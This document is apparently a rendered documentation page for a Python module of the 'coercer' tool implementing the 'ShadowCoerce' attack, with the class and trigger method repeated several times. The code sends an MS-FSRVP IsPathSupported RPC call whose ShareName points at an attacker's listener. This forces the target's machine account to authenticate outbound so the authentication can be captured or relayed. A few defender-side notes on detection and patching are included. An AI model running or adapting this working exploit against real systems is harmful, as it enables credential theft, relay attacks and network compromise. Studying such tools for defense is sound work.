coercer.methods.MS_FSRVP.IsPathSupported
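#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : IsPathSupported.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _IsPathSupported(NDRCALL):
    """
    Request structure for the RPC call IsPathSupported() (opnum 8) of the
    [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b).

    The single input, ``ShareName``, is a UNC path. The server attempts to
    reach that path while handling the call; pointing it at an attacker host
    is what coerces the target into authenticating outbound.
    """
    opnum = 8
    structure = (
        # IDL type is LPWSTR. impacket's WSTR does not append the terminating
        # NUL itself, so the value written here must already end in "\x00"
        # (see IsPathSupported.exploit_paths).
        ('ShareName', WSTR),  # Type: LPWSTR
    )


class _IsPathSupportedResponse(NDRCALL):
    """
    Response structure for IsPathSupported() (opnum 8) of the
    [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b).

    impacket resolves the response class by the ``<RequestClass>Response``
    naming convention, so this class must exist under exactly this name. Its
    body is intentionally empty: the out-parameters the spec defines (a BOOL
    and an owner machine name) carry nothing this module needs, because the
    coercion happens as a side effect of the server processing ShareName.
    """
    structure = ()


class IsPathSupported(MSPROTOCOLRPCCALL):
    """
    Coerce a machine to authenticate using function IsPathSupported (opnum 8) of the
    [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
    (the technique is commonly referred to as "ShadowCoerce").

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)

    How it works: ``ShareName`` is filled with a UNC path that points at the
    attacker's listener. When the server tries to reach that path, the
    target's machine account authenticates to the listener, where the
    authentication can be captured or relayed.

    NOTE(review) — defender-side caveats, not enforced by this code:
    - The interface is reachable on the ``\\PIPE\\Fssagentrpc`` named pipe and
      over TCP under UUID a8e0653c-2744-4389-a61d-7373df8b2292; a call to it
      from a host that has no business managing shadow copies is worth an alert.
    - The endpoint only exists where the File Server VSS Agent is present, and
      Microsoft is reported to have hardened it in a 2022 update, so expect the
      method to fail on patched hosts — verify on the target rather than assume.
    - What the coerced authentication is worth depends on relay mitigations
      (SMB/LDAP signing, channel binding) on the hosts it is relayed to.
    """

    # Value written into ShareName. ``{{listener}}`` is substituted by the
    # framework with the attacker host; the trailing NUL is the string
    # terminator impacket's WSTR expects the caller to supply.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports the framework may use to bind to the interface. The
    # ``ncan_np`` key is presumably matched literally elsewhere in coercer —
    # do not "correct" it to ``ncacn_np`` without checking the callers.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\Fssagentrpc",
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
        "shortname": "MS-FSRVP"
    }

    function = {
        "name": "IsPathSupported",
        "opnum": 8,
        "vulnerable_arguments": ["ShareName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one IsPathSupported() request with ``self.path`` as ShareName.

        Args:
            dcerpc_session: a bound impacket DCE/RPC session on this
                interface, or None if connect() was never called.
            target: unused here; kept for the common trigger() signature.

        Returns:
            "" when the request was sent and answered without error; the
            exception instance when anything failed (returned, not raised, so
            the caller can inspect it — an error reply does not necessarily
            mean the authentication was not coerced); None when there is no
            session.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _IsPathSupported()
            # self.path is the rendered exploit path; presumably set by the
            # framework from exploit_paths before trigger() is called.
            request['ShareName'] = self.path
            # The reply is irrelevant: the side effect of the server handling
            # ShareName is the whole point, so the response is not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: transport, DCE/RPC and NDR failures are all
            # handed back to the caller as a value.
            return err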
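class IsPathSupported(MSPROTOCOLRPCCALL):
    """
    Coerce a machine to authenticate using function IsPathSupported (opnum 8) of the
    [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
    (the technique is commonly referred to as "ShadowCoerce").

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)

    How it works: ``ShareName`` is filled with a UNC path that points at the
    attacker's listener. When the server tries to reach that path, the
    target's machine account authenticates to the listener, where the
    authentication can be captured or relayed.

    NOTE(review) — defender-side caveats, not enforced by this code:
    - The interface is reachable on the ``\\PIPE\\Fssagentrpc`` named pipe and
      over TCP under UUID a8e0653c-2744-4389-a61d-7373df8b2292; a call to it
      from a host that has no business managing shadow copies is worth an alert.
    - The endpoint only exists where the File Server VSS Agent is present, and
      Microsoft is reported to have hardened it in a 2022 update, so expect the
      method to fail on patched hosts — verify on the target rather than assume.
    - What the coerced authentication is worth depends on relay mitigations
      (SMB/LDAP signing, channel binding) on the hosts it is relayed to.
    """

    # Value written into ShareName. ``{{listener}}`` is substituted by the
    # framework with the attacker host; the trailing NUL is the string
    # terminator impacket's WSTR expects the caller to supply.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports the framework may use to bind to the interface. The
    # ``ncan_np`` key is presumably matched literally elsewhere in coercer —
    # do not "correct" it to ``ncacn_np`` without checking the callers.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\Fssagentrpc",
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
        "shortname": "MS-FSRVP"
    }

    function = {
        "name": "IsPathSupported",
        "opnum": 8,
        "vulnerable_arguments": ["ShareName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one IsPathSupported() request with ``self.path`` as ShareName.

        Args:
            dcerpc_session: a bound impacket DCE/RPC session on this
                interface, or None if connect() was never called.
            target: unused here; kept for the common trigger() signature.

        Returns:
            "" when the request was sent and answered without error; the
            exception instance when anything failed (returned, not raised, so
            the caller can inspect it — an error reply does not necessarily
            mean the authentication was not coerced); None when there is no
            session.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _IsPathSupported()
            # self.path is the rendered exploit path; presumably set by the
            # framework from exploit_paths before trigger() is called.
            request['ShareName'] = self.path
            # The reply is irrelevant: the side effect of the server handling
            # ShareName is the whole point, so the response is not kept.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Deliberately broad: transport, DCE/RPC and NDR failures are all
            # handed back to the caller as a value.
            return err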
Coercing a machine to authenticate using function IsPathSupported (opnum 8) of MS-FSRVP Protocol
Method found by: @topotam77
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\Fssagentrpc', 'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}]}
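def trigger(self, dcerpc_session, target):
    """
    Send one IsPathSupported() request with ``self.path`` as ShareName.

    Args:
        dcerpc_session: a bound impacket DCE/RPC session on this interface,
            or None if connect() was never called.
        target: unused here; kept for the common trigger() signature.

    Returns:
        "" when the request was sent and answered without error; the
        exception instance when anything failed (returned, not raised, so the
        caller can inspect it — an error reply does not necessarily mean the
        authentication was not coerced); None when there is no session.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _IsPathSupported()
        # self.path is the rendered exploit path; presumably set by the
        # framework from exploit_paths before trigger() is called.
        request['ShareName'] = self.path
        # The reply is irrelevant: the side effect of the server handling
        # ShareName is the whole point, so the response is not kept.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Deliberately broad: transport, DCE/RPC and NDR failures are all
        # handed back to the caller as a value.
        return err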